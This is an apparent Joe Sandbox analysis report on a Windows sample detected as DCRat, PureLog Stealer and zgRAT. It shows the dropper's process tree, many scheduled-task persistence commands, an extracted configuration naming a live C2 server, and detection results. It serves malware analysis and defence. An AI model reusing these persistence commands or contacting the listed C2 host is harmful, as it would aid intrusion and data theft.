Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
gorkmTnChA.exe

Overview

General Information

Sample name:gorkmTnChA.exe
renamed because original name is a hash value
Original sample name:E4E1923F51EB61ED20CBBFAB84AB25B5.exe
Analysis ID:1570976
MD5:e4e1923f51eb61ed20cbbfab84ab25b5
SHA1:f50f90821c5e40a6b5289b8a0b084f831177cbef
SHA256:093e2a0c52459c17133b8dce76c887d8eb3588f2fdfc7b1cfb342a7225b6cdd6
Tags:DCRatexeuser-abuse_ch
Infos:

Detection

DCRat, PureLog Stealer, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
.NET source code contains method to dynamically call methods (often used by packers)
AI detected suspicious sample
Creates processes via WMI
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks for available system drives (often done to infect USB drives)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Execution From GUID Like Folder Names
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

  • System is w10x64
  • gorkmTnChA.exe (PID: 6524 cmdline: "C:\Users\user\Desktop\gorkmTnChA.exe" MD5: E4E1923F51EB61ED20CBBFAB84AB25B5)
    • DCRatBuild.exe (PID: 3384 cmdline: "C:\Users\user\AppData\Local\Temp\DCRatBuild.exe" MD5: A7645CAC446E39F9961F51E3BB1C0515)
      • wscript.exe (PID: 1748 cmdline: "C:\Windows\System32\WScript.exe" "C:\bridgeMonitorDhcpCommon\osBsCLbPfQftwHCHlhElxAOzJXM9OXwC38dZCkih.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
        • cmd.exe (PID: 7312 cmdline: C:\Windows\system32\cmd.exe /c ""C:\bridgeMonitorDhcpCommon\KQ5XnVOYWwQFrPTZ9PsIrToBZTIRzi3E3YTHck8Ca7MF45bBlpw.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 7320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • webDriverintoDll.exe (PID: 7364 cmdline: "C:\bridgeMonitorDhcpCommon/webDriverintoDll.exe" MD5: 26C2B88440A62B4CB79201E01A404BD2)
            • schtasks.exe (PID: 7620 cmdline: schtasks.exe /create /tn "KAdpNCgonFhCnlBRasdZerWlK" /sc MINUTE /mo 7 /tr "'C:\Program Files\Uninstall Information\KAdpNCgonFhCnlBRasdZerWl.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • schtasks.exe (PID: 7636 cmdline: schtasks.exe /create /tn "KAdpNCgonFhCnlBRasdZerWl" /sc ONLOGON /tr "'C:\Program Files\Uninstall Information\KAdpNCgonFhCnlBRasdZerWl.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • schtasks.exe (PID: 7652 cmdline: schtasks.exe /create /tn "KAdpNCgonFhCnlBRasdZerWlK" /sc MINUTE /mo 14 /tr "'C:\Program Files\Uninstall Information\KAdpNCgonFhCnlBRasdZerWl.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • schtasks.exe (PID: 7668 cmdline: schtasks.exe /create /tn "KAdpNCgonFhCnlBRasdZerWlK" /sc MINUTE /mo 7 /tr "'C:\Program Files\Windows NT\Accessories\en-GB\KAdpNCgonFhCnlBRasdZerWl.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • schtasks.exe (PID: 7684 cmdline: schtasks.exe /create /tn "KAdpNCgonFhCnlBRasdZerWl" /sc ONLOGON /tr "'C:\Program Files\Windows NT\Accessories\en-GB\KAdpNCgonFhCnlBRasdZerWl.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • schtasks.exe (PID: 7700 cmdline: schtasks.exe /create /tn "KAdpNCgonFhCnlBRasdZerWlK" /sc MINUTE /mo 5 /tr "'C:\Program Files\Windows NT\Accessories\en-GB\KAdpNCgonFhCnlBRasdZerWl.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • schtasks.exe (PID: 7716 cmdline: schtasks.exe /create /tn "ApplicationFrameHostA" /sc MINUTE /mo 10 /tr "'C:\Users\Default User\Favorites\ApplicationFrameHost.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • schtasks.exe (PID: 7732 cmdline: schtasks.exe /create /tn "ApplicationFrameHost" /sc ONLOGON /tr "'C:\Users\Default User\Favorites\ApplicationFrameHost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • schtasks.exe (PID: 7748 cmdline: schtasks.exe /create /tn "ApplicationFrameHostA" /sc MINUTE /mo 12 /tr "'C:\Users\Default User\Favorites\ApplicationFrameHost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • schtasks.exe (PID: 7764 cmdline: schtasks.exe /create /tn "KAdpNCgonFhCnlBRasdZerWlK" /sc MINUTE /mo 8 /tr "'C:\bridgeMonitorDhcpCommon\KAdpNCgonFhCnlBRasdZerWl.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • schtasks.exe (PID: 7780 cmdline: schtasks.exe /create /tn "KAdpNCgonFhCnlBRasdZerWl" /sc ONLOGON /tr "'C:\bridgeMonitorDhcpCommon\KAdpNCgonFhCnlBRasdZerWl.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • schtasks.exe (PID: 7800 cmdline: schtasks.exe /create /tn "KAdpNCgonFhCnlBRasdZerWlK" /sc MINUTE /mo 10 /tr "'C:\bridgeMonitorDhcpCommon\KAdpNCgonFhCnlBRasdZerWl.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • schtasks.exe (PID: 7816 cmdline: schtasks.exe /create /tn "KAdpNCgonFhCnlBRasdZerWlK" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\reference assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • schtasks.exe (PID: 7832 cmdline: schtasks.exe /create /tn "KAdpNCgonFhCnlBRasdZerWl" /sc ONLOGON /tr "'C:\Program Files (x86)\reference assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • schtasks.exe (PID: 7848 cmdline: schtasks.exe /create /tn "KAdpNCgonFhCnlBRasdZerWlK" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\reference assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • cmd.exe (PID: 7888 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\uMu0Nxwczl.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 7896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • chcp.com (PID: 7940 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
              • w32tm.exe (PID: 7960 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
              • KAdpNCgonFhCnlBRasdZerWl.exe (PID: 8132 cmdline: "C:\Program Files\Windows NT\Accessories\en-GB\KAdpNCgonFhCnlBRasdZerWl.exe" MD5: 26C2B88440A62B4CB79201E01A404BD2)
    • SandeLLoCHECKER_Installer.exe (PID: 6036 cmdline: "C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe" MD5: 8A0591A6B534E32FA179F2D781B79026)
      • msiexec.exe (PID: 5480 cmdline: "C:\Windows\system32\msiexec.exe" /i C:\Users\user\AppData\Local\Temp\{F123046A-2CBF-4743-A59B-E3D2751B5780}\51B5780\SandeLLoCHECKER_Installer.msi AI_SETUPEXEPATH=C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe SETUPEXEDIR=C:\Users\user\AppData\Local\Temp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1733667848 " AI_FOUND_PREREQS=".NET Framework 4.8 (web installer)" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • msiexec.exe (PID: 7076 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • msiexec.exe (PID: 3804 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 26CF464DBA35F416758053A43B23FD3D C MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • msiexec.exe (PID: 7184 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 7BC9C83AA604E4F7E55BC37E42BF8976 C MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • KAdpNCgonFhCnlBRasdZerWl.exe (PID: 8000 cmdline: "C:\Program Files (x86)\reference assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe" MD5: 26C2B88440A62B4CB79201E01A404BD2)
  • KAdpNCgonFhCnlBRasdZerWl.exe (PID: 8028 cmdline: "C:\Program Files (x86)\reference assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe" MD5: 26C2B88440A62B4CB79201E01A404BD2)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DCRatDCRat is a typical RAT that has been around since at least June 2019.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat
NameDescriptionAttributionBlogpost URLsLink
zgRATzgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

Threatname: DCRat

{"C2 url": "http://185.246.67.73/Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
gorkmTnChA.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
    gorkmTnChA.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security

      Dropped Files

      SourceRuleDescriptionAuthorStrings
      C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
        C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          C:\Users\Default\Favorites\ApplicationFrameHost.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
            C:\Users\Default\Favorites\ApplicationFrameHost.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              C:\Users\Default\Favorites\ApplicationFrameHost.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                Click to see the 9 entries

                Memory Dumps

                SourceRuleDescriptionAuthorStrings
                00000024.00000002.2899943903.00000000034E3000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                  00000000.00000003.1654559691.0000000002BD3000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                    00000001.00000003.1656268229.00000000051CA000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                      00000001.00000003.1655715436.000000000688F000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                        0000000B.00000000.1775306001.00000000004E2000.00000002.00000001.01000000.00000015.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                          Click to see the 6 entries

                          Unpacked PEs

                          SourceRuleDescriptionAuthorStrings
                          1.3.DCRatBuild.exe.5218700.1.raw.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                            1.3.DCRatBuild.exe.5218700.1.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                              11.0.webDriverintoDll.exe.4e0000.0.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                                11.0.webDriverintoDll.exe.4e0000.0.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                                  1.3.DCRatBuild.exe.68dd700.0.raw.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                                    Click to see the 15 entries

                                    Sigma Signatures

                                    System Summary

                                    barindex
                                    Sigma detected: Suspicious Execution From GUID Like Folder Names
                                    Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\system32\msiexec.exe" /i C:\Users\user\AppData\Local\Temp\{F123046A-2CBF-4743-A59B-E3D2751B5780}\51B5780\SandeLLoCHECKER_Installer.msi AI_SETUPEXEPATH=C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe SETUPEXEDIR=C:\Users\user\AppData\Local\Temp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1733667848 " AI_FOUND_PREREQS=".NET Framework 4.8 (web installer)", CommandLine: "C:\Windows\system32\msiexec.exe" /i C:\Users\user\AppData\Local\Temp\{F123046A-2CBF-4743-A59B-E3D2751B5780}\51B5780\SandeLLoCHECKER_Installer.msi AI_SETUPEXEPATH=C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe SETUPEXEDIR=C:\Users\user\AppData\Local\Temp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1733667848 " AI_FOUND_PREREQS=".NET Framework 4.8 (web installer)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\msiexec.exe, NewProcessName: C:\Windows\SysWOW64\msiexec.exe, OriginalFileName: C:\Windows\SysWOW64\msiexec.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe, ParentProcessId: 6036, ParentProcessName: SandeLLoCHECKER_Installer.exe, ProcessCommandLine: "C:\Windows\system32\msiexec.exe" /i C:\Users\user\AppData\Local\Temp\{F123046A-2CBF-4743-A59B-E3D2751B5780}\51B5780\SandeLLoCHECKER_Installer.msi AI_SETUPEXEPATH=C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe SETUPEXEDIR=C:\Users\user\AppData\Local\Temp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1733667848 " AI_FOUND_PREREQS=".NET Framework 4.8 (web installer)", ProcessId: 5480, ProcessName: msiexec.exe
                                    Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                                    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\bridgeMonitorDhcpCommon\osBsCLbPfQftwHCHlhElxAOzJXM9OXwC38dZCkih.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\bridgeMonitorDhcpCommon\osBsCLbPfQftwHCHlhElxAOzJXM9OXwC38dZCkih.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\DCRatBuild.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe, ParentProcessId: 3384, ParentProcessName: DCRatBuild.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\bridgeMonitorDhcpCommon\osBsCLbPfQftwHCHlhElxAOzJXM9OXwC38dZCkih.vbe" , ProcessId: 1748, ProcessName: wscript.exe

                                    Suricata Signatures

                                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                    2024-12-08T15:27:23.309899+010020480951A Network Trojan was detected192.168.2.449743185.246.67.7380TCP
                                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                    2024-12-08T15:27:00.047076+010028292021A Network Trojan was detected192.168.2.449730172.67.184.109443TCP

                                    Joe Sandbox Signatures

                                    Click to jump to signature section

                                    Show All Signature Results

                                    AV Detection

                                    barindex
                                    Antivirus / Scanner detection for submitted sample
                                    Source: gorkmTnChA.exeAvira: detected
                                    Source: gorkmTnChA.exeAvira: detected
                                    Source: gorkmTnChA.exeAvira: detected
                                    Source: gorkmTnChA.exeAvira: detected
                                    Antivirus detection for dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeAvira: detection malicious, Label: VBS/Runner.VPG
                                    Source: C:\Users\Default\Favorites\ApplicationFrameHost.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    Source: C:\Users\user\Desktop\BXyiPEuJ.logAvira: detection malicious, Label: HEUR/AGEN.1300079
                                    Source: C:\Users\user\Desktop\ClgJzaDG.logAvira: detection malicious, Label: HEUR/AGEN.1362695
                                    Source: C:\Users\user\AppData\Local\Temp\uMu0Nxwczl.batAvira: detection malicious, Label: BAT/Delbat.C
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeAvira: detection malicious, Label: TR/Redcap.apero
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    Found malware configuration
                                    Source: 0000000B.00000002.1853703523.0000000012EE9000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: DCRat {"C2 url": "http://185.246.67.73/Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}
                                    Multi AV Scanner detection for dropped file
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeReversingLabs: Detection: 63%
                                    Source: C:\Program Files\Uninstall Information\KAdpNCgonFhCnlBRasdZerWl.exeReversingLabs: Detection: 63%
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\KAdpNCgonFhCnlBRasdZerWl.exeReversingLabs: Detection: 63%
                                    Source: C:\Users\Default\Favorites\ApplicationFrameHost.exeReversingLabs: Detection: 63%
                                    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeReversingLabs: Detection: 63%
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeReversingLabs: Detection: 50%
                                    Source: C:\Users\user\Desktop\AOGsABiv.logReversingLabs: Detection: 15%
                                    Source: C:\Users\user\Desktop\BXyiPEuJ.logReversingLabs: Detection: 25%
                                    Source: C:\Users\user\Desktop\GKQhrBJx.logReversingLabs: Detection: 25%
                                    Source: C:\Users\user\Desktop\JrPikvxc.logReversingLabs: Detection: 25%
                                    Source: C:\Users\user\Desktop\MAAYLQkP.logReversingLabs: Detection: 20%
                                    Source: C:\Users\user\Desktop\OfhhMrNQ.logReversingLabs: Detection: 25%
                                    Source: C:\Users\user\Desktop\UvPgJftz.logReversingLabs: Detection: 29%
                                    Source: C:\Users\user\Desktop\XaQepXPR.logReversingLabs: Detection: 15%
                                    Source: C:\Users\user\Desktop\XgvwQtEs.logReversingLabs: Detection: 50%
                                    Source: C:\Users\user\Desktop\ZkmfqpvS.logReversingLabs: Detection: 25%
                                    Source: C:\Users\user\Desktop\aHPfiQDx.logReversingLabs: Detection: 20%
                                    Source: C:\Users\user\Desktop\dYYVtYJg.logReversingLabs: Detection: 37%
                                    Source: C:\Users\user\Desktop\hwUMgwXg.logReversingLabs: Detection: 50%
                                    Source: C:\Users\user\Desktop\jyGvCfcb.logReversingLabs: Detection: 25%
                                    Source: C:\Users\user\Desktop\lNILRSep.logReversingLabs: Detection: 20%
                                    Source: C:\Users\user\Desktop\nBMUCfZn.logReversingLabs: Detection: 50%
                                    Source: C:\Users\user\Desktop\uAoBkxMT.logReversingLabs: Detection: 29%
                                    Source: C:\Users\user\Desktop\wKKCkQsU.logReversingLabs: Detection: 37%
                                    Source: C:\Users\user\Desktop\xqfrsuNN.logReversingLabs: Detection: 50%
                                    Source: C:\Users\user\Desktop\yYksYVbT.logReversingLabs: Detection: 20%
                                    Source: C:\bridgeMonitorDhcpCommon\KAdpNCgonFhCnlBRasdZerWl.exeReversingLabs: Detection: 63%
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeReversingLabs: Detection: 63%
                                    Multi AV Scanner detection for submitted file
                                    Source: gorkmTnChA.exeReversingLabs: Detection: 100%
                                    AI detected suspicious sample
                                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                                    Machine Learning detection for dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeJoe Sandbox ML: detected
                                    Source: C:\Users\Default\Favorites\ApplicationFrameHost.exeJoe Sandbox ML: detected
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeJoe Sandbox ML: detected
                                    Source: C:\Users\user\Desktop\BXyiPEuJ.logJoe Sandbox ML: detected
                                    Source: C:\Users\user\Desktop\ClgJzaDG.logJoe Sandbox ML: detected
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeJoe Sandbox ML: detected
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeJoe Sandbox ML: detected
                                    Source: C:\Users\user\Desktop\AOGsABiv.logJoe Sandbox ML: detected
                                    Machine Learning detection for sample
                                    Source: gorkmTnChA.exeJoe Sandbox ML: detected
                                    Source: gorkmTnChA.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeDirectory created: C:\Program Files\Uninstall Information\KAdpNCgonFhCnlBRasdZerWl.exeJump to behavior
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeDirectory created: C:\Program Files\Uninstall Information\98135c31e34d63Jump to behavior
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeDirectory created: C:\Program Files\Windows NT\Accessories\en-GB\KAdpNCgonFhCnlBRasdZerWl.exeJump to behavior
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeDirectory created: C:\Program Files\Windows NT\Accessories\en-GB\98135c31e34d63Jump to behavior
                                    Source: unknownHTTPS traffic detected: 172.67.184.109:443 -> 192.168.2.4:49730 version: TLS 1.2
                                    Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: gorkmTnChA.exe, DCRatBuild.exe.0.dr
                                    Source: Binary string: wininet.pdb source: SandeLLoCHECKER_Installer.exe, 00000003.00000003.1732315055.000000000503A000.00000004.00000020.00020000.00000000.sdmp
                                    Source: Binary string: C:\NetFXDev1\binaries\x86ret\bin\i386\VSSetup\Utils\boxstub.pdb source: gorkmTnChA.exe
                                    Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\Prereq.pdb| source: SandeLLoCHECKER_Installer.exe, 00000003.00000002.2902345730.00000000062BA000.00000002.00000010.00040000.0000001B.sdmp
                                    Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\ShortcutFlags.pdb source: SandeLLoCHECKER_Installer.exe, 00000003.00000002.2902345730.00000000062BA000.00000002.00000010.00040000.0000001B.sdmp, ShortcutFlags.dll.3.dr
                                    Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\ShortcutFlags.pdb@ source: SandeLLoCHECKER_Installer.exe, 00000003.00000002.2902345730.00000000062BA000.00000002.00000010.00040000.0000001B.sdmp, ShortcutFlags.dll.3.dr
                                    Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\ResourceCleaner.pdb source: SandeLLoCHECKER_Installer.exe, 00000003.00000002.2902345730.00000000062BA000.00000002.00000010.00040000.0000001B.sdmp
                                    Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\Prereq.pdb source: SandeLLoCHECKER_Installer.exe, 00000003.00000002.2902345730.00000000062BA000.00000002.00000010.00040000.0000001B.sdmp
                                    Source: Binary string: wininet.pdbUGP source: SandeLLoCHECKER_Installer.exe, 00000003.00000003.1732315055.000000000503A000.00000004.00000020.00020000.00000000.sdmp
                                    Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\SoftwareDetector.pdb source: SandeLLoCHECKER_Installer.exe, 00000003.00000002.2902345730.0000000006170000.00000002.00000010.00040000.0000001B.sdmp, MSI4DB5.tmp.7.dr, MSI44B9.tmp.3.dr, SandeLLoCHECKER_Installer.msi.3.dr
                                    Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\SoftwareDetector.pdbl source: SandeLLoCHECKER_Installer.exe, 00000003.00000002.2902345730.0000000006170000.00000002.00000010.00040000.0000001B.sdmp, MSI4DB5.tmp.7.dr, MSI44B9.tmp.3.dr, SandeLLoCHECKER_Installer.msi.3.dr
                                    Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\lzmaextractor.pdb source: SandeLLoCHECKER_Installer.exe, 00000003.00000002.2902345730.0000000006170000.00000002.00000010.00040000.0000001B.sdmp, lzmaextractor.dll.3.dr, SandeLLoCHECKER_Installer.msi.3.dr
                                    Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\AICustAct.pdb source: SandeLLoCHECKER_Installer.exe, 00000003.00000002.2902345730.00000000062BA000.00000002.00000010.00040000.0000001B.sdmp, MSI4969.tmp.7.dr, MSI43FC.tmp.3.dr
                                    Source: Binary string: C:\ReleaseAI\win\Release\stubs\x86\ExternalUi.pdb source: gorkmTnChA.exe
                                    Source: Binary string: -C:\NetFXDev1\binaries\x86ret\bin\i386\VSSetup\Utils\boxstub.pdb source: gorkmTnChA.exe
                                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: z:Jump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: x:Jump to behavior
